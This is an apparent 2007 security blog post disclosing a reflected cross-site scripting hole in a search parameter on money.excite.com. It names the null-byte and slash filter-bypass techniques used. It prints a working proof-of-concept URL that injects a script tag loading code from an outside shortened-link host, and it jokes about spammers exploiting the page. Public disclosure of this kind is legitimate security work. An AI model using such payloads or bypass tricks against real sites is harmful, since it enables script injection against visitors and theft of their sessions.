MOSEB-29: Vulnerability at money.excite.com

19:48 29.06.2007

Next participant of the project is Excite search engine. It is one of the popular meta search engines (in USA).

The vulnerability is at Excite Money & Investing (money.excite.com) in symbol search results. This Cross-Site Scripting hole I found 31.05.2007. And I used null byte filters bypass technique for Mozilla and slash filters bypass technique for Internet Explorer.

XSS:

The vulnerability is in symbol_search_text parameter:
http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%3Cscript%00src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E

Also page with html injection hole has PR7. It is a dream and black seo guys will be happy :-) .

Moral: searching for money can be dangerous.

Note, that Excite engine belongs to IAC Search & Media. So Ask.com also responsible for this vulnerability.

P.S.

Also I prepared others holes concerned with Excite. So wait for today’s bonus post ;-) .


Leave a Reply

You must be logged in to post a comment.